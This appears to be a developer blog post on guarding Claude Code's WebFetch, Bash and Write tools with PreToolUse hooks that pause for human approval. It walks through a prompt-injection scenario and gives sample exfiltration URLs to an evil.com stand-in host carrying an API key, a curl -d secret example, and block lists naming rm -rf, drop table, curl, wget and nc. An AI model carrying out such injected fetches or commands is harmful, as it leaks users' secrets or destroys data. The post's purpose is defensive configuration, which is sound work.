
Every time Claude Code fetches a URL, it asks for permission. After the 50th approval for a docs...
Every time Claude Code fetches a URL, it asks for permission. After the 50th approval for a docs page, you start wondering — can I just auto-allow this?
You can. But there's a catch: WebFetch can send data in query parameters. A prompt injection buried in a file could trick Claude into fetching https://evil.com?secret=YOUR_API_KEY. Auto-approving everything means you'd never see it happen.
Here's how I set up a middle ground: auto-allow clean URLs, but show a confirmation prompt when query parameters are present.
You might think adding WebFetch to permissions is enough:
// ~/.claude/settings.json
{
"permissions": {
"allow": ["WebFetch"]
}
}
This works — but it auto-allows everything, including https://evil.com?token=abc123. No safety net.
Claude Code has a PreToolUse hook system. A hook runs before every tool call and can:
The hook receives the full tool call as JSON via stdin — tool name, input parameters, session ID, everything.
Here's the setup in ~/.claude/settings.json:
{
"hooks": {
"PreToolUse": [
{
"matcher": "WebFetch",
"hooks": [
{
"type": "command",
"command": "python3 -c \"import sys,json; data=json.load(sys.stdin); url=data.get('tool_input',{}).get('url',''); print('URL has query params, review: '+url, file=sys.stderr) if '?' in url else None; sys.exit(1) if '?' in url else sys.exit(0)\"",
"statusMessage": "Checking WebFetch URL for query params..."
}
]
}
]
}
}
That's it. One hook, zero dependencies.
| URL | Behavior |
|---|---|
https://docs.python.org/3/library/json.html | Auto-allowed, no prompt |
https://api.example.com/data?key=secret | Shows URL, asks you to approve or deny |
When a URL has query params, you'll see something like:
URL has query params, review: https://api.example.com/data?key=secret
And Claude Code pauses for your decision. If it's legitimate (like a search query or API docs with anchors), you approve. If it looks suspicious, you deny.
The PreToolUse hook receives JSON on stdin with this structure:
{
"session_id": "abc-123",
"hook_event_name": "PreToolUse",
"tool_name": "WebFetch",
"tool_input": {
"url": "https://example.com/page?q=test",
"prompt": "Summarize this page"
}
}
The Python one-liner:
tool_input.url? is presentpermissions.allow overrides hooksThis tripped me up. If you add WebFetch to both permissions.allow AND set up a hook:
{
"permissions": {
"allow": ["WebFetch"]
},
"hooks": {
"PreToolUse": [...]
}
}
The hook never fires. permissions.allow takes full precedence — the tool is approved before the hook even runs. Remove the permission rule and let the hook be the sole gatekeeper.
Hook input comes via stdin, not an environment variable. I initially tried os.environ.get('ARGUMENTS') — it was empty. The correct approach is json.load(sys.stdin).
You can apply this pattern to other tools too. Some ideas:
Bash command guard — ask before running destructive commands:
{
"matcher": "Bash",
"hooks": [{
"type": "command",
"command": "python3 -c \"import sys,json; cmd=json.load(sys.stdin).get('tool_input',{}).get('command',''); dangerous=any(w in cmd for w in ['rm -rf','drop table','--force','--hard']); print('Dangerous command: '+cmd, file=sys.stderr) if dangerous else None; sys.exit(1) if dangerous else sys.exit(0)\""
}]
}
Write guard — flag writes to sensitive paths:
{
"matcher": "Write",
"hooks": [{
"type": "command",
"command": "python3 -c \"import sys,json; path=json.load(sys.stdin).get('tool_input',{}).get('file_path',''); sensitive=any(s in path for s in ['.env','.key','credentials','secret']); print('Writing to sensitive file: '+path, file=sys.stderr) if sensitive else None; sys.exit(1) if sensitive else sys.exit(0)\""
}]
}
This hook catches the most common exfiltration vector — query parameters. But data can leak through other parts of a URL too:
Path parameters:
https://evil.com/exfil/YOUR_API_KEY/done
Subdomains:
https://YOUR_API_KEY.evil.com/callback
Fragment identifiers (less risky since fragments aren't sent to servers, but still worth knowing):
https://evil.com/page#secret=abc
POST body via other tools — if an attacker tricks Claude into using Bash with curl -d "secret=xxx", WebFetch hooks won't catch it at all.
?, flip the logic. Only auto-allow domains you trust, and ask for everything else:{
"command": "python3 -c \"import sys,json; from urllib.parse import urlparse; data=json.load(sys.stdin); url=data.get('tool_input',{}).get('url',''); host=urlparse(url).hostname or ''; trusted=['docs.python.org','developer.mozilla.org','github.com','stackoverflow.com']; is_trusted=any(host.endswith(d) for d in trusted); print('Unknown domain: '+url, file=sys.stderr) if not is_trusted else None; sys.exit(0 if is_trusted else 1)\""
}
Layer your defenses — combine the query param hook with a domain allowlist. Use exit 0 for trusted domains with no params, exit 1 for trusted domains with params or unknown domains, and exit 2 for known-bad patterns.
Watch your Bash tool too — add a separate hook for Bash that flags curl, wget, or nc commands with suspicious arguments.
Review the URL every time you approve — sounds obvious, but when you're in flow and approving prompts quickly, it's easy to glaze over. The whole point of exit code 1 is to make you pause. Actually pause.
Bottom line: The hook in this article reduces your attack surface significantly — most prompt injection exfiltration uses query params because it's the easiest path. But no single check catches everything. Treat this as one layer, not the whole wall.
permissions.allow for WebFetch — it bypasses all hooksPreToolUse hook that exits 0 (allow) or 1 (ask) based on the URL~/.claude/settings.json makes it global across all projectsThe goal isn't to block Claude from fetching URLs. It's to keep yourself in the loop when data might be leaving your machine. Two minutes of setup, permanent peace of mind — but stay vigilant.
If you're using Claude Code daily, these small safety guardrails compound. Two minutes of config now saves you from a bad day later. Got a better hook setup? Drop it in the comments — let's build a community-maintained collection.
aiMost of us have seen a coding agent fail to complete a task we know it can do. We just don't...
googlecloudWhen building Generative AI applications, developers often encounter a massive bottleneck: sequential...
discussI’ve been thinking about sharing some electronic circuit posts on Dev.to — small circuits, DIY...
agentsWhat nobody tells you about exporting your multi-agent prototype to a local workspace. Every...
agenticarchitectAutonomous agents are genuinely good at answering messy business questions. Give one an LLM and a set...
aiPR volume went up, ticket quality didn't, and the gap got filled with LLMs on both sides of the review: bots reviewing, bots replying, bots occasionally arguing with bots about priorities that only existed in a teammate's head. Our CEO named the actual problem, and it's bigger than code review.
Workflows from the Neura Market marketplace related to this Stable Diffusion resource